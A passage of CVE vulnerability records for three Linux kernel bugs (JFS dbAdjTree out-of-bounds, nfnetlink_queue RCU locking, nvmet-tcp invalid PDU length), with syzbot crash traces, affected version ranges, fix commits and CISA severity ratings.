"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nFS:JFS:UBSAN:array-index-out-of-bounds in dbAdjTree\n\nSyzkaller reported the following issue:\n\nUBSAN: array-index-out-of-bounds in fs/jfs/jfs_dmap.c:2867:6\nindex 196694 is out of range for type \u0027s8[1365]\u0027 (aka \u0027signed char[1365]\u0027)\nCPU: 1 PID: 109 Comm: jfsCommit Not tainted 6.6.0-rc3-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/04/2023\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106\n ubsan_epilogue lib/ubsan.c:217 [inline]\n __ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348\n dbAdjTree+0x474/0x4f0 fs/jfs/jfs_dmap.c:2867\n dbJoin+0x210/0x2d0 fs/jfs/jfs_dmap.c:2834\n dbFreeBits+0x4eb/0xda0 fs/jfs/jfs_dmap.c:2331\n dbFreeDmap fs/jfs/jfs_dmap.c:2080 [inline]\n dbFree+0x343/0x650 fs/jfs/jfs_dmap.c:402\n txFreeMap+0x798/0xd50 fs/jfs/jfs_txnmgr.c:2534\n txUpdateMap+0x342/0x9e0\n txLazyCommit fs/jfs/jfs_txnmgr.c:2664 [inline]\n jfs_lazycommit+0x47a/0xb70 fs/jfs/jfs_txnmgr.c:2732\n kthread+0x2d3/0x370 kernel/kthread.c:388\n ret_from_fork+0x48/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n \u003c/TASK\u003e\n================================================================================\nKernel panic - not syncing: UBSAN: panic_on_warn set ...\nCPU: 1 PID: 109 Comm: jfsCommit Not tainted 6.6.0-rc3-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/04/2023\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106\n panic+0x30f/0x770 kernel/panic.c:340\n check_panic_on_warn+0x82/0xa0 kernel/panic.c:236\n ubsan_epilogue lib/ubsan.c:223 [inline]\n __ubsan_handle_out_of_bounds+0x13c/0x150 lib/ubsan.c:348\n dbAdjTree+0x474/0x4f0 fs/jfs/jfs_dmap.c:2867\n dbJoin+0x210/0x2d0 fs/jfs/jfs_dmap.c:2834\n dbFreeBits+0x4eb/0xda0 fs/jfs/jfs_dmap.c:2331\n dbFreeDmap fs/jfs/jfs_dmap.c:2080 [inline]\n dbFree+0x343/0x650 fs/jfs/jfs_dmap.c:402\n txFreeMap+0x798/0xd50 fs/jfs/jfs_txnmgr.c:2534\n txUpdateMap+0x342/0x9e0\n txLazyCommit fs/jfs/jfs_txnmgr.c:2664 [inline]\n jfs_lazycommit+0x47a/0xb70 fs/jfs/jfs_txnmgr.c:2732\n kthread+0x2d3/0x370 kernel/kthread.c:388\n ret_from_fork+0x48/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n \u003c/TASK\u003e\nKernel Offset: disabled\nRebooting in 86400 seconds..\n\nThe issue is caused when the value of lp becomes greater than\nCTLTREESIZE which is the max size of stree. Adding a simple check\nsolves this issue.\n\nDave:\nAs the function returns a void, good error handling\nwould require a more intrusive code reorganization, so I modified\nOsama\u0027s patch at use WARN_ON_ONCE for lack of a cleaner option.\n\nThe patch is tested via syzbot."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:43.418Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e3e95c6850661c77e6dab079d9b5374a618ebb15"
},
{
"url": "https://git.kernel.org/stable/c/98f9537fe61b8382b3cc5dd97347531698517c56"
},
{
"url": "https://git.kernel.org/stable/c/de34de6e57bbbc868e4fcf9e98c76b3587cabb0b"
},
{
"url": "https://git.kernel.org/stable/c/6fe8b702125aeee6ce83f20092a2341446704e7b"
},
{
"url": "https://git.kernel.org/stable/c/42f433785f108893de0dd5260bafb85d7d51db03"
},
{
"url": "https://git.kernel.org/stable/c/6a44065dd604972ec1fbcccbdc4a70d266a89cdd"
},
{
"url": "https://git.kernel.org/stable/c/59342822276f753e49d27ef5eebffbba990572b9"
},
{
"url": "https://git.kernel.org/stable/c/9862ec7ac1cbc6eb5ee4a045b5d5b8edbb2f7e68"
}
],
"title": "FS:JFS:UBSAN:array-index-out-of-bounds in dbAdjTree",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52604",
"datePublished": "2024-03-06T06:45:30.246Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:43.418Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36286 (GCVE-0-2024-36286)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()
syzbot reported that nf_reinject() could be called without rcu_read_lock() :
WARNING: suspicious RCU usage
6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Not tainted
net/netfilter/nfnetlink_queue.c:263 suspicious rcu_dereference_check() usage!
other info that might help us debug this:
rcu_scheduler_active = 2, debug_locks = 1
2 locks held by syz-executor.4/13427:
#0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:329 [inline]
#0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2190 [inline]
#0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_core+0xa86/0x1830 kernel/rcu/tree.c:2471
#1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]
#1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: nfqnl_flush net/netfilter/nfnetlink_queue.c:405 [inline]
#1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: instance_destroy_rcu+0x30/0x220 net/netfilter/nfnetlink_queue.c:172
stack backtrace:
CPU: 0 PID: 13427 Comm: syz-executor.4 Not tainted 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024
Call Trace:
<IRQ>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114
lockdep_rcu_suspicious+0x221/0x340 kernel/locking/lockdep.c:6712
nf_reinject net/netfilter/nfnetlink_queue.c:323 [inline]
nfqnl_reinject+0x6ec/0x1120 net/netfilter/nfnetlink_queue.c:397
nfqnl_flush net/netfilter/nfnetlink_queue.c:410 [inline]
instance_destroy_rcu+0x1ae/0x220 net/netfilter/nfnetlink_queue.c:172
rcu_do_batch kernel/rcu/tree.c:2196 [inline]
rcu_core+0xafd/0x1830 kernel/rcu/tree.c:2471
handle_softirqs+0x2d6/0x990 kernel/softirq.c:554
__do_softirq kernel/softirq.c:588 [inline]
invoke_softirq kernel/softirq.c:428 [inline]
__irq_exit_rcu+0xf4/0x1c0 kernel/softirq.c:637
irq_exit_rcu+0x9/0x30 kernel/softirq.c:649
instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1043 [inline]
sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1043
</IRQ>
<TASK>
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:08.764Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8658bd777cbfcb0c13df23d0ea120e70517761b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3989b817857f4890fab9379221a9d3f52bf5c256"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e01065b339e323b3dfa1be217fd89e9b3208b0ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25ea5377e3d2921a0f96ae2551f5ab1b36825dd4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68f40354a3851df46c27be96b84f11ae193e36c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f365564af898819a523f1a8cf5c6ce053e9f718"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/215df6490e208bfdd5b3012f5075e7f8736f3e7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc21c6cc3d6986d938efbf95de62473982c98dec"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36286",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:34.720987Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:45.892Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nfnetlink_queue.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8658bd777cbfcb0c13df23d0ea120e70517761b9",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "3989b817857f4890fab9379221a9d3f52bf5c256",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "e01065b339e323b3dfa1be217fd89e9b3208b0ab",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "25ea5377e3d2921a0f96ae2551f5ab1b36825dd4",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "68f40354a3851df46c27be96b84f11ae193e36c5",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "8f365564af898819a523f1a8cf5c6ce053e9f718",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "215df6490e208bfdd5b3012f5075e7f8736f3e7a",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "dc21c6cc3d6986d938efbf95de62473982c98dec",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nfnetlink_queue.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.25"
},
{
"lessThan": "2.6.25",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.25",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()\n\nsyzbot reported that nf_reinject() could be called without rcu_read_lock() :\n\nWARNING: suspicious RCU usage\n6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Not tainted\n\nnet/netfilter/nfnetlink_queue.c:263 suspicious rcu_dereference_check() usage!\n\nother info that might help us debug this:\n\nrcu_scheduler_active = 2, debug_locks = 1\n2 locks held by syz-executor.4/13427:\n #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:329 [inline]\n #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2190 [inline]\n #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_core+0xa86/0x1830 kernel/rcu/tree.c:2471\n #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]\n #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: nfqnl_flush net/netfilter/nfnetlink_queue.c:405 [inline]\n #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: instance_destroy_rcu+0x30/0x220 net/netfilter/nfnetlink_queue.c:172\n\nstack backtrace:\nCPU: 0 PID: 13427 Comm: syz-executor.4 Not tainted 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nCall Trace:\n \u003cIRQ\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114\n lockdep_rcu_suspicious+0x221/0x340 kernel/locking/lockdep.c:6712\n nf_reinject net/netfilter/nfnetlink_queue.c:323 [inline]\n nfqnl_reinject+0x6ec/0x1120 net/netfilter/nfnetlink_queue.c:397\n nfqnl_flush net/netfilter/nfnetlink_queue.c:410 [inline]\n instance_destroy_rcu+0x1ae/0x220 net/netfilter/nfnetlink_queue.c:172\n rcu_do_batch kernel/rcu/tree.c:2196 [inline]\n rcu_core+0xafd/0x1830 kernel/rcu/tree.c:2471\n handle_softirqs+0x2d6/0x990 kernel/softirq.c:554\n __do_softirq kernel/softirq.c:588 [inline]\n invoke_softirq kernel/softirq.c:428 [inline]\n __irq_exit_rcu+0xf4/0x1c0 kernel/softirq.c:637\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:649\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1043 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1043\n \u003c/IRQ\u003e\n \u003cTASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:03.459Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8658bd777cbfcb0c13df23d0ea120e70517761b9"
},
{
"url": "https://git.kernel.org/stable/c/3989b817857f4890fab9379221a9d3f52bf5c256"
},
{
"url": "https://git.kernel.org/stable/c/e01065b339e323b3dfa1be217fd89e9b3208b0ab"
},
{
"url": "https://git.kernel.org/stable/c/25ea5377e3d2921a0f96ae2551f5ab1b36825dd4"
},
{
"url": "https://git.kernel.org/stable/c/68f40354a3851df46c27be96b84f11ae193e36c5"
},
{
"url": "https://git.kernel.org/stable/c/8f365564af898819a523f1a8cf5c6ce053e9f718"
},
{
"url": "https://git.kernel.org/stable/c/215df6490e208bfdd5b3012f5075e7f8736f3e7a"
},
{
"url": "https://git.kernel.org/stable/c/dc21c6cc3d6986d938efbf95de62473982c98dec"
}
],
"title": "netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36286",
"datePublished": "2024-06-21T10:18:08.364Z",
"dateReserved": "2024-06-21T10:13:16.315Z",
"dateUpdated": "2025-11-04T17:21:08.764Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52454 (GCVE-0-2023-52454)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length
If the host sends an H2CData command with an invalid DATAL,
the kernel may crash in nvmet_tcp_build_pdu_iovec().
Unable to handle kernel NULL pointer dereference at
virtual address 0000000000000000
lr : nvmet_tcp_io_work+0x6ac/0x718 [nvmet_tcp]
Call trace:
process_one_work+0x174/0x3c8
worker_thread+0x2d0/0x3e8
kthread+0x104/0x110
Fix the bug by raising a fatal error if DATAL isn't coherent
with the packet size.
Also, the PDU length should never exceed the MAXH2CDATA parameter which
has been communicated to the host in nvmet_tcp_handle_icreq().
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 Version: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52454",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-26T14:16:59.030675Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:40.242Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.623Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee5e7632e981673f42a50ade25e71e612e543d9d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f775f2621c2ac5cc3a0b3a64665dad4fb146e510"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4cb3cf7177ae3666be7fb27d4ad4d72a295fb02d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2871aa407007f6f531fae181ad252486e022df42"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24e05760186dc070d3db190ca61efdbce23afc88"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70154e8d015c9b4fb56c1a2ef1fc8b83d45c7f68"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/efa56305908ba20de2104f1b8508c6a7401833be"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/target/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ee5e7632e981673f42a50ade25e71e612e543d9d",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
},
{
"lessThan": "f775f2621c2ac5cc3a0b3a64665dad4fb146e510",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
},
{
"lessThan": "4cb3cf7177ae3666be7fb27d4ad4d72a295fb02d",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
},
{
"lessThan": "2871aa407007f6f531fae181ad252486e022df42",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
},
{
"lessThan": "24e05760186dc070d3db190ca61efdbce23afc88",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
},
{
"lessThan": "70154e8d015c9b4fb56c1a2ef1fc8b83d45c7f68",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
},
{
"lessThan": "efa56305908ba20de2104f1b8508c6a7401833be",
"status": "affected",
"version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/target/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length\n\nIf the host sends an H2CData command with an invalid DATAL,\nthe kernel may crash in nvmet_tcp_build_pdu_iovec().\n\nUnable to handle kernel NULL pointer dereference at\nvirtual address 0000000000000000\nlr : nvmet_tcp_io_work+0x6ac/0x718 [nvmet_tcp]\nCall trace:\n process_one_work+0x174/0x3c8\n worker_thread+0x2d0/0x3e8\n kthread+0x104/0x110\n\nFix the bug by raising a fatal error if DATAL isn\u0027t coherent\nwith the packet size.\nAlso, the PDU length should never exceed the MAXH2CDATA parameter which\nhas been communicated to the host in nvmet_tcp_handle_icreq()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:52.616Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ee5e7632e981673f42a50ade25e71e612e543d9d"
},
{
"url": "https://git.kernel.org/stable/c/f775f2621c2ac5cc3a0b3a64665dad4fb146e510"
},
{
"url": "https://git.kernel.org/stable/c/4cb3cf7177ae3666be7fb27d4ad4d72a295fb02d"
},
{
"url": "https://git.kernel.org/stable/c/2871aa407007f6f531fae181ad252486e022df42"
},
{
"url": "https://git.kernel.org/stable/c/24e05760186dc070d3db190ca61efdbce23afc88"
},
{
"url": "https://git.kernel.org/stable/c/70154e8d015c9b4fb56c1a2ef1fc8b83d45c7f68"
},
{
"url": "https://git.kernel.org/stable/c/efa56305908ba20de2104f1b8508c6a7401833be"
}
],
"title": "nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length",
"x_generator": {
